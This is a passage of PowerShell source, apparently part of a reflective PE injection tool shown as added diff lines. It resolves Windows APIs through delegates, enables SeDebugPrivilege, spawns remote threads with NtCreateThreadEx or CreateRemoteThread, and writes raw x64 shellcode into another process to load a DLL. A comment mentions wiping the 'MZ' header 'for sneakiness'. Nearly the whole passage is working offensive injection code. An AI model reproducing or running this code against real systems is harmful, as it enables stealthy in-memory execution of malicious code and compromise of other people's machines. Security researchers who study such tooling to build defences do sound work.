$CreateRemoteThread + + $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread + $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool]) + $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread + + $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken + $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) + $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken + + $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread + $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) + $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread + + $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges + $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool]) + $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges + + $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA + $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool]) + $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue + + $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf + $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) + $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf + + $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx + $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) + $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + + $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process + $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) + $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process + + $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread + $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr]) + $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread + + return $Win32Functions + } + ##################################### + + + ##################################### + ########### HELPERS ############ + ##################################### + + #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function + #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses + Function Sub-SignedIntAsUnsigned + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + $CarryOver = 0 + for ($i = 0; $i -lt $Value1Bytes.Count; $i++) + { + $Val = $Value1Bytes[$i] - $CarryOver + #Sub bytes + if ($Val -lt $Value2Bytes[$i]) + { + $Val += 256 + $CarryOver = 1 + } + else + { + $CarryOver = 0 + } + + + [UInt16]$Sum = $Val - $Value2Bytes[$i] + + $FinalBytes[$i] = $Sum -band 0x00FF + } + } + else + { + Throw "Cannot subtract bytearrays of different sizes" + } + + return [BitConverter]::ToInt64($FinalBytes, 0) + } + + + Function Add-SignedIntAsUnsigned + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + $CarryOver = 0 + for ($i = 0; $i -lt $Value1Bytes.Count; $i++) + { + #Add bytes + [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver + + $FinalBytes[$i] = $Sum -band 0x00FF + + if (($Sum -band 0xFF00) -eq 0x100) + { + $CarryOver = 1 + } + else + { + $CarryOver = 0 + } + } + } + else + { + Throw "Cannot add bytearrays of different sizes" + } + + return [BitConverter]::ToInt64($FinalBytes, 0) + } + + + Function Compare-Val1GreaterThanVal2AsUInt + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) + { + if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) + { + return $true + } + elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) + { + return $false + } + } + } + else + { + Throw "Cannot compare byte arrays of different size" + } + + return $false + } + + + Function Convert-UIntToInt + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [UInt64] + $Value + ) + + [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) + return ([BitConverter]::ToInt64($ValueBytes, 0)) + } + + + Function Test-MemoryRangeValid + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [String] + $DebugString, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 2, Mandatory = $true)] + [IntPtr] + $StartAddress, + + [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] + [IntPtr] + $EndAddress, + + [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] + [IntPtr] + $Size + ) + + [IntPtr]$FinalEndAddress = [IntPtr]::Zero + if ($PsCmdlet.ParameterSetName -eq "Size") + { + [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) + } + else + { + $FinalEndAddress = $EndAddress + } + + $PEEndAddress = $PEInfo.EndAddress + + if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true) + { + Throw "Trying to write to memory smaller than allocated address range. $DebugString" + } + if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true) + { + Throw "Trying to write to memory greater than allocated address range. $DebugString" + } + } + + + Function Write-BytesToMemory + { + Param( + [Parameter(Position=0, Mandatory = $true)] + [Byte[]] + $Bytes, + + [Parameter(Position=1, Mandatory = $true)] + [IntPtr] + $MemoryAddress + ) + + for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) + { + [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) + } + } + + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-DelegateType + { + Param + ( + [OutputType([Type])] + + [Parameter( Position = 0)] + [Type[]] + $Parameters = (New-Object Type[](0)), + + [Parameter( Position = 1 )] + [Type] + $ReturnType = [Void] + ) + + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) + $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) + $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') + $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) + $MethodBuilder.SetImplementationFlags('Runtime, Managed') + + Write-Output $TypeBuilder.CreateType() + } + + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-ProcAddress + { + Param + ( + [OutputType([IntPtr])] + + [Parameter( Position = 0, Mandatory = $True )] + [String] + $Module, + + [Parameter( Position = 1, Mandatory = $True )] + [String] + $Procedure + ) + + # Get a reference to System.dll in the GAC + $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | + Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } + $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') + # Get a reference to the GetModuleHandle and GetProcAddress methods + $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') + $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') + # Get a handle to the module specified + $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) + $tmpPtr = New-Object IntPtr + $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) + + # Return the address of the function + Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) + } + + + Function Enable-SeDebugPrivilege + { + Param( + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke() + if ($ThreadHandle -eq [IntPtr]::Zero) + { + Throw "Unable to get the handle to the current thread" + } + + [IntPtr]$ThreadToken = [IntPtr]::Zero + [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) + { + $Result = $Win32Functions.ImpersonateSelf.Invoke(3) + if ($Result -eq $false) + { + Throw "Unable to impersonate self" + } + + $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) + { + Throw "Unable to OpenThreadToken." + } + } + else + { + Throw "Unable to OpenThreadToken. Error code: $ErrorCode" + } + } + + [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.LUID)) + $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid) + if ($Result -eq $false) + { + Throw "Unable to call LookupPrivilegeValue" + } + + [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.TOKEN_PRIVILEGES) + [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) + $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, $Win32Types.TOKEN_PRIVILEGES) + $TokenPrivileges.PrivilegeCount = 1 + $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, $Win32Types.LUID) + $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED + [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true) + + $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value + if (($Result -eq $false) -or ($ErrorCode -ne 0)) + { + #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set + } + + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) + } + + + Function Invoke-CreateRemoteThread + { + Param( + [Parameter(Position = 1, Mandatory = $true)] + [IntPtr] + $ProcessHandle, + + [Parameter(Position = 2, Mandatory = $true)] + [IntPtr] + $StartAddress, + + [Parameter(Position = 3, Mandatory = $false)] + [IntPtr] + $ArgumentPtr = [IntPtr]::Zero, + + [Parameter(Position = 4, Mandatory = $true)] + [System.Object] + $Win32Functions + ) + + [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero + + $OSVersion = [Environment]::OSVersion.Version + #Vista and Win7 + if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) + { + Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress" + $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero) + $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($RemoteThreadHandle -eq [IntPtr]::Zero) + { + Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError" + } + } + #XP/Win8 + else + { + Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress" + $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero) + } + + if ($RemoteThreadHandle -eq [IntPtr]::Zero) + { + Write-Verbose "Error creating remote thread, thread handle is null" + } + + return $RemoteThreadHandle + } + + + + Function Get-ImageNtHeaders + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + $NtHeadersInfo = New-Object System.Object + + #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness + $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, $Win32Types.IMAGE_DOS_HEADER) + + #Get IMAGE_NT_HEADERS + [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr + $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, $Win32Types.IMAGE_NT_HEADERS64) + + #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. + if ($imageNtHeaders64.Signature -ne 0x00004550) + { + throw "Invalid IMAGE_NT_HEADER signature." + } + + if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') + { + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true + } + else + { + $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, $Win32Types.IMAGE_NT_HEADERS32) + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 + $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false + } + + return $NtHeadersInfo + } + + + #This function will get the information needed to allocated space in memory for the PE + Function Get-PEBasicInfo + { + Param( + [Parameter( Position = 0, Mandatory = $true )] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + $PEInfo = New-Object System.Object + + #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot. + [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length) + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null + + #Get NtHeadersInfo + $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types + + #Build a structure with the information which will be needed for allocating memory and writing the PE to memory + $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics) + + #Free the memory allocated above, this isn't where we allocate the PE to memory + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes) + + return $PEInfo + } + + + #PEInfo must contain the following NoteProperties: + # PEHandle: An IntPtr to the address the PE is loaded to in memory + Function Get-PEDetailedInfo + { + Param( + [Parameter( Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) + { + throw 'PEHandle is null or IntPtr.Zero' + } + + $PEInfo = New-Object System.Object + + #Get NtHeaders information + $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types + + #Build the PEInfo object + $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle + $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) + $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) + $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) + $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) + + if ($PEInfo.PE64Bit -eq $true) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_NT_HEADERS64))) + $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr + } + else + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_NT_HEADERS32))) + $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr + } + + if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL) + { + $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL' + } + elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) + { + $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE' + } + else + { + Throw "PE file is not an EXE or DLL" + } + + return $PEInfo + } + + + Function Import-DllInRemoteProcess + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $RemoteProcHandle, + + [Parameter(Position=1, Mandatory=$true)] + [IntPtr] + $ImportDllPathPtr + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) + + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) + $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1) + $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($RImportDllPathPtr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process" + } + + [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten) + + if ($Success -eq $false) + { + Throw "Unable to write DLL path to remote process memory" + } + if ($DllPathSize -ne $NumBytesWritten) + { + Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" + } + + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes + + [IntPtr]$DllAddress = [IntPtr]::Zero + #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address + # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes. + if ($PEInfo.PE64Bit -eq $true) + { + #Allocate memory for the address returned by LoadLibraryA + $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($LoadLibraryARetMem -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA" + } + + + #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm) + $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) + $LoadLibrarySC2 = @(0x48, 0xba) + $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba) + $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + + $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length) + + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory + [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) + if ($Result -eq $false) + { + Throw "Call to ReadProcessMemory failed" + } + [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [IntPtr]) + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + } + else + { + [IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + [Int32]$ExitCode = 0 + $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode) + if (($Result -eq 0) -or ($ExitCode -eq 0)) + { + Throw "Call to GetExitCodeThread failed" + } + + [IntPtr]$DllAddress = [IntPtr]$ExitCode + } + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + + return $DllAddress + } + + + Function Get-RemoteProcAddress + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $RemoteProcHandle, + + [Parameter(Position=1, Mandatory=$true)] + [IntPtr] + $RemoteDllHandle, + + [Parameter(Position=2, Mandatory=$true)] + [String] + $FunctionName + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) + $FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName) + + #Write FunctionName to memory (will be used in GetProcAddress) + $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1) + 